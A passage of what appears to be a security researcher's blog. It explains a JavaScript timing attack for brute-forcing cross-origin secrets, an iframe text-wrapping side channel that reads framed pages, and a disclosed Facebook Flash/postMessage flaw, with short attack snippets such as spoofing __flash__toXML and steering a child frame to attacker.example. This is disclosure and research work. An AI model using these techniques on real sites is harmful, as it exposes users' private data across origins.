If you try to repeat the experiment with just 2 characters, the results are significantly different (note this graph rounds results to the closest integer). You won't be able to notice any difference.. at all. The line is flat up to a million iterations. That means that comparing "aa" vs "bb" a million times runs in about the same amount of time as the true comparison (not as impressive as our 6X!).

But.. we don't always need impressive differences to be able to make a decision (see this graph without the rounding). With just two characters, the true comparison usually runs in exactly the same time, sometimes a tiny bit faster, but also many times slightly slower. In essence, it seems to run at about 1.02 times the cost of a false comparison.

Now, the fact this graph looks so messy means our exploit won't be as reliable, and will require significantly more samples to detect any changes. We now have in our hands a probabilistic attack.

To exploit this, we will need to perform the attack a couple hundred, a couple thousand, or a couple million times (this actually depends on the machine: a slow machine has more measurable results but also more noise; a fast machine has less measurable results but allows more accurate measurements).

With the samples, we either average the results, take the mean of means (which needs a lot of samples), use a chi-squared test if we know the variance, or a Student's t-test if we can assume a normal distribution (JavaScript's garbage collector skews things a bit).

At the end of the day, I ended up creating my own test, and was able to brute force a string in a different origin via code that does:

if (SECRET == userSupplied) {
   // do nothing
}
Here are some results on string comparison on Chrome:
  • It is possible to bruteforce an 18 digit number in about 3 minutes on most machines.
    • Without the timing attack you would need to perform 5 quadrillion comparisons per second. With the timing attack you only need 1 million.
  • It is possible to reliably calculate a 9 character alphanumeric string in about 10 minutes.
    • This is different from the numbers because here we have a 37-character alphabet, while with numbers it's just 10.
If you are interested in playing around with it, and you have patience (a lot of patience!), check this and this. They will literally take 5-10 minutes to run, and they will simply try to order 7 strings according to the time they took to compare. Both of them run about a million string comparisons using window.postMessage as the input, so it takes a while.

If you have even more patience you can run this which will run different combinations of iterations/samples trying to figure out which works best (slow machines work better with less iterations and more samples, faster machines run best with more iterations and less samples).

So, summary!
  • Timing attacks are easy thanks to JavaScript's single-threadedness. That might change with things like process isolation, but it will continue to be possible for the time being.
  • String comparison can be measured and attacked, but it's probabilistic and really slow with the existing attacks.
Let me know if you can improve the attack (if you can get it under 1 minute for an 18 digit number, you are my hero!), find a problem in the sampling/data, or otherwise are able to generalize the ReDoS exploit to string comparison / indexOf operations :)

Another attack that might be worth discussing is that strings from different origins are both stored in the same hash table. This means that if we were able to distinguish a hashtable miss from a hashtable match, we could read strings cross-origin.

I spent a lot of time trying to make that to work, but it didn't work out. If you can do it, let me know as well :)

Thanks for reading!

Sunday, September 22, 2013

[Matryoshka] - Wrapping Overflow Leak on Frames

I just came back from a very fun trip around Europe. Among other places, I visited Hamburg, to attend HackPra 2013, which was hosted in AppSec Europe. In there I gave the presentation Matryoshka - titled after the famous Russian dolls.

Today I'm blogging about one of the subjects of that presentation: an information leak introduced by a "side channel" present in iframes. I didn't give much detail in the presentation since I was afraid I would run out of time (this was just one part of the presentation). This blogpost is meant to add more detail, as well as cover a couple of things I wasn't sure worked at the time of the presentation.

A quick summary of the problem: under certain circumstances, it is possible to know when text inside an iframe wraps to the next line. Text wrapping is what happens when a line is longer than the width of the area it is displayed in, so it continues on a second line.

Being able to detect text wrapping is an interesting problem, as it allows us to learn some information about the framed website, which might be particularly dangerous under some circumstances.

To show a small example, the following iframe is hosted in a different domain than this blog post:

We are disallowed from knowing what the contents are because of the Same Origin Policy. It's important to understand this: we can iframe anything, including third party sites you are authenticated to. This might include sites that contain secret information, like your email inbox, or your bank statements.

Now, let's see what we can do:

  • We can change the width and height of this iframe at will.
  • We can navigate the inner iframes from that page.
  • We can change the style of its scrollbars, or detect their presence.
To clarify, changing the width and height of the iframe will allow us to force some content to wrap on to the next line. To exploit this we need to know whether the content wrapped or not.

Navigating Child Iframes

By navigating child iframes, we can change an otherwise innocuous iframe (such as a Facebook like button) to a domain we control. We can do this by design, even on cross-domain iframes. Look:

The reason for this is because the window.frames[] property is exposed cross-origin, and it's allowed by the Same Origin Policy to navigate child frames, even those that are cross domain.
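For example (a sketch; the element id and URL are made up):

  // Navigate a child frame of a cross-origin page we embed. The Same Origin
  // Policy allows setting a cross-origin frame's location.
  var victim = document.getElementById('victim');  // <iframe> of the target
  victim.contentWindow.frames[0].location =
      'https://attacker.example/probe.html';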

The reason this matters is that once we control a child iframe in our target page, we can know the position of that iframe relative to the browser/screen. This will let us know if the content of the page wrapped, as we'll discuss later on.

Detecting when the text wraps to the next line is the cornerstone of this attack.

Detecting Iframe Screen Coordinates

In Trident and Gecko based browsers, it is possible to detect the position of an iframe relative to the screen. This is interesting, as it allows us to know exactly when an iframe moves down because of text wrapping.

We detect this with one of two properties: window.screenTop for Trident based browsers, or window.mozInnerScreenY for Gecko based browsers (and mouse events in general). These properties are only readable from within the target iframe, but as we explained before, it is perfectly possible to navigate our target site's child iframes. Once we do that, we can reduce the width of our iframe until text doesn't fit on the line anymore, the rest of the line moves to the next one, and our iframe is displaced.
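Inside the probe iframe we navigated into place, the check could look like this (a sketch; the reporting channel is made up):

  // Poll our own on-screen position: if the text above us wraps, we move down.
  var baseline = window.mozInnerScreenY || window.screenTop;
  setInterval(function() {
    var y = window.mozInnerScreenY || window.screenTop;
    if (y !== baseline) top.postMessage('wrapped', '*');
  }, 10);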

Please note this proof of concept doesn't work in all browsers (notably, it only works in firefox/ie), so it might not work for you, but feel free to give it a try.

Detecting Scrollbars Presence

This is interesting: in some browsers, it is possible to apply CSS to the scrollbars of an iframe. This matters because a background-image on the scrollbar is only requested when the scrollbar is shown, which leaks whether the text wrapped. In some browsers you need to change the backgroundImage after the creation of the iframe for the image to be requested.

Please note this proof of concept doesn't work in all browsers (notably, it only works in WebKit-based browsers), so it might not work for you, but feel free to give it a try.

What will happen when you click that button is:
  • The width of the iframe will be slowly reduced pixel by pixel.
  • When the word "dusk" wraps to the next line, it will display the vertical scrollbar.
  • When the vertical scrollbar is shown, the background image will be requested.
  • We detect when such requests happen by checking document.cookie.
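The styling trick could look something like this (a sketch; the logging URL is a placeholder, and the actual demo detects the request via document.cookie instead):

  // Style the iframe's scrollbar (WebKit) so that showing it fetches an image.
  var style = document.createElement('style');
  style.textContent =
      'iframe::-webkit-scrollbar {' +
      '  background-image: url(https://attacker.example/log?scrollbar); }';
  document.head.appendChild(style);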

Measuring Word Width

So far we found a way to tell when text wraps to the next line: either by detecting the presence of a scrollbar, or by navigating a child iframe and detecting its position relative to the screen.

To measure a specific word width, we will follow the following steps:
  1. Resize the target iframe to:
    • width: 9999999px
    • height: smallest-without-scrollbar;
  2. Slowly reduce the width until the text wraps. (You can reduce in fractions of a pixel.)
    • If you are detecting a scrollbar, ensure to increase the height to make the scrollbar disappear.
    • If you are detecting text wrapped from a child iframe, detect changes from the new current position.
  3. Repeat
    • Record the exact width at which text wrapping happened.
We will actually learn things in a bit of an odd order. For this particular example, we will get the lengths of the following:
  • First wrapping: hello, my name is bond, james bond.
  • Second wrapping: the secret is on the island!
  • Third wrapping: bond, james bond.
  • Fourth wrapping: name is bond,
  • Fifth wrapping: bond, james
  • Sixth wrapping: the secret
  • Seventh wrapping: my name
  • Eighth wrapping: secret is
  • Ninth wrapping: name is
  • Tenth wrapping: is on
The exact fraction of a pixel at which the line wraps (which, in practice, I've seen sometimes needs to be as accurate as 1E-10 pixels) tells us the length of the line.

By calculating the difference between different lines, we can also get the length of other sequences of words:
  1. hello, my name is
  2. hello, my james bond.
  3. hello, my name is bond.
  4. hello, is bond, james bond.
  5. hello, my bond, james bond.
  6. ...
And we can also get "bond" by subtracting (1) from (3). We can also get "james" by subtracting (3) from the first wrapping, etc.. We might not always get a specific word's length, but rather that of a group of two words; the attack works in both cases.

The question now is.. how hard is it to go from the width of the word (or sequence of words) to the actual contents of them?

Turns out that, usually, all letters have a different width, and as long as such widths are unique, it's almost trivial to calculate which letters are in each wrapping (although we don't get the order of the letters).

The solution to this is the classic knapsack problem, which I won't go into the details of. While we won't be able to get the order of the letters, we can get which letters are present to a reasonable degree of accuracy, which should be sufficient to make a very good guess of the value.

It's unclear what the best solution to this problem is. This information leak isn't a vulnerability per-se in browsers, but rather a well known and understood feature. This blog post will hopefully trigger some discussion around the subject so we can come up with solutions.

One challenge is that if we stopped providing mozInnerScreenY / screenTop, then it would be significantly harder to detect and protect against clickjacking. So whichever solution we come up with needs to take that into consideration.

It's also worth mentioning what happens when our iframe is so small that a word doesn't even fit. The answer is that individual characters wrap to the next line, and we can then extract the width of each individual character (rather than each word). This unfortunately doesn't work that well on normal websites, as by default they don't break words (unless overridden by CSS's break-word). If we could get this, however, it would be possible to obtain the order of the characters in each word (and completely read the contents of the iframe without having to guess).

And that was it! This attack allows you to steal content from websites that don't use X-Frame-Options (or a fixed CSS width) in all major browsers, with standard browser functionality (no vuln up my sleeve!). I felt inclined to use an acronym for this attack (WOLF) since Thai Duong/Juliano Rizzo's attacks (POET, BEAST, CRIME) sound better than "cross-BLAH-jacking", and I like wolves (although not as much as cats), especially since it kind of feels like insanity wolf to me.

Friday, December 16, 2011

Doing Cross Page Communication Correctly

I haven't updated this blog in more than one year (woops), but it seems like I still have a couple of followers, so I was thinking about what to write. I was originally planning to post this in August, but the fix was delayed more than expected.

I decided to choose a random target on the interwebs to find an interesting vuln, and since Facebook recently launched its "Whitehat Program", which rewards people that report security vulnerabilities to them (kinda the same as Google's Vulnerability Reward Program), I chose them.

(Note: As of December 15, Facebook says they have fixed the vulnerability, and awarded a $2,500 USD bounty).

So, I took a look at their "main JS file":

And well, the first thing that came to my mind was RPC. Mostly because I worked on implementing Apache Shindig's version of the Flash RPC, and have helped review easyXDM's implementation, so I just knew this is too hard to get right.

A simple grep for ".swf" in their all.js file led me to "/swf/XdComm.swf". And since I didn't know what domain that was on, I tried it:

And that worked.

So let's see.. I decompiled it, and we get this:

There are several non-security-bugs in that code (some of which I decided to ignore for brevity and keep the WTF quota of this blog low).

In general, the security problems found are not specific to FB at all; they are mostly side effects of bad design decisions in either Flash or the browsers. However, these problems are widely known and can be abused by attackers to compromise information.

Calling security.allowDomain

The first thing I noticed is that XdComm calls Security.allowDomain and Security.allowInsecureDomain. This allows anyone to execute code in the context of the hosting domain, so it's a Flash XSS. FAIL #1.

The way you exploit this is by loading the victim SWF inside the attacker's SWF. That's it. The problem here is that Adobe provides only one API for enabling two very different functionalities. In this case, what Facebook wants is to just allow an HTML container to call whitelisted 'callbacks' in the SWF, but inadvertently it is also allowing anyone to load the SWF inside another SWF and access all its methods and variables, which can result in code execution.

Adobe actually acknowledges this is a problem, and they will make changes to support these two different use cases. The reason I don't provide a PoC is that several applications out there depend on this behavior and can't easily deploy fixes, and Adobe is working on fixing this in Flash (which is where it should be fixed). When there's a viable alternative or a good solution I'll post a PoC.
What FB should have done is keep this SWF out of their main domain.
Getting the embedding page location

The second thing I noticed is that it gets the origin of the page hosting the SWF by calling:
this.currentDomain ="self.document.domain.toString");
And as any Flash developer should know, isn't something you can actually trust, so you can "cheat" XdComm.swf into thinking it's being embedded by a page it isn't, by simply overriding __flash__toXML.

So, by abusing this vulnerable check, we can actually listen and send messages on any LocalConnection channel. This doesn't only mean we just defeated the security of the transport; if any other SWF file on those domains uses LocalConnection, we can sniff into that as well. So, FAIL #2.

It is hard for a movie (or any plugin, for that matter) to know with certainty where it's being hosted. A SWF can be sure it's hosted on the same domain by requiring the hosting page to call a method in the movie (added by ExternalInterface.addCallback), since by default Flash only allows pages hosted on the same domain to call a movie's callback methods (this is what we do in Shindig, for example), but besides that it's not so simple.

Some insecure methods exist and are widely used to learn the hosting page, such as calling:"window.location.toString")
There are some variations of that code, such as calling window.location.href.toString, which is also simple to bypass by rewriting the String.toString method, and the bypass works in all browsers.

It's futile to try to "protect" those scripts: because of the way Flash handles ExternalInterface, it's possible to modify every single call made by the plugin, since when you call, what really happens is that the plugin injects a script into the window with:
ExecScript('try { __flash__toXML(' + yourCode + ') ; } catch (e) { "<undefined;>"; }');

And, __flash__toXML is a global function injected by Flash, which can be modified to return whatever we want.
    var o;
    // answer Flash's serialization request with a value of our choosing
    window.__flash__toXML = function () { return o("potato") };
    // capture the real serializer if/when the plugin (re)injects it
    window.__defineSetter__("__flash__toXML", function(x) {o = x;});
It's worth noting that Flash also bases some of its security decisions on the value of window.location (such as whether a movie is allowed to be scripted from a website or not), and while this check is more difficult to tamper with (and browsers actively fix it), it's still possible to do it, and it's even easier in other browsers such as Safari (on Mac OS), where you can just replace the functions "__flash_getWindowLocation" and "__flash_getTopLocation".

Luckily, it seems like we might be able to get at least the right origin in future versions of Flash, as Mozilla is proposing a new NPAPI call just for this. Let's just hope that Adobe makes it available to the SWF application via some API.

What FB should have done is namespace the channel names, and use some other way of verifying the page embedding the SWF (like easyXDM or Shindig does).

It is also possible for an attacker to specify which transport it wishes to use, so we might be able to force a page to use the Flash transport even when it also supports postMessage.

postMessage should be used cautiously

There's one last thing I found. Facebook has a page which seems to allow an attacker to forge (postMessage) messages as coming from Facebook into another page that allows framing arbitrary pages.

The Proof of Concept is located at

As you can see, the page will allow an attacker to send messages, and will also allow the attacker to specify the target origin. The attack seems hard to pull off since the "parent" seems to be hard coded. So this is FAIL #3.

This is a good demonstration of why the existing usage patterns of postMessage are fundamentally broken: it's really easy for two different scripts to interfere with each other. I can't actually blame FB for this; it's more like a design problem in postMessage.

Luckily there's a new mechanism to use postMessage (called channel messaging), which partly solves this problem (or at least makes it harder to happen). You can read more about it here:
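In a nutshell, channel messaging gives you a dedicated port pair instead of broadcasting on window.postMessage (a sketch; otherWindow and the origin are placeholders):

  var channel = new MessageChannel();
  channel.port1.onmessage = function(e) { console.log('got:',; };
  // hand port2 to the frame we want to talk to; only it can use this channel
  otherWindow.postMessage('init', '', [channel.port2]);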

Random fact.. This is what Chrome uses internally to communicate with other components like the Web Inspector.

Vendor Response

I reported these issues on Tuesday, Aug 16 2011 at 2 PM (PST), with the draft of this blogpost, and got a human acknowledgement at 7 PM. The issue was finally fixed on December 15, 2011.


So well, this was my first post of 2011 (and it's December!). I actually wrote it because there was some "de facto" knowledge about Flash that I wanted to put in writing somewhere, and because I had a look at Facebook regarding something not strictly related to work!

In general I am impressed with the security of Facebook's applications. While doing this I got locked out of my account like 5 or 6 times (maybe they detected strange behavior?), I noticed several security protections in their API, and they actually do protect against other security vulnerabilities that most websites don't know about (such as escaping bugs, content type sniffing, etc).

I was awarded a $2,500.00 USD bounty for this report (not sure how it was calculated), and I'm considering donating it to charity (it can become 5k!). Any suggestions?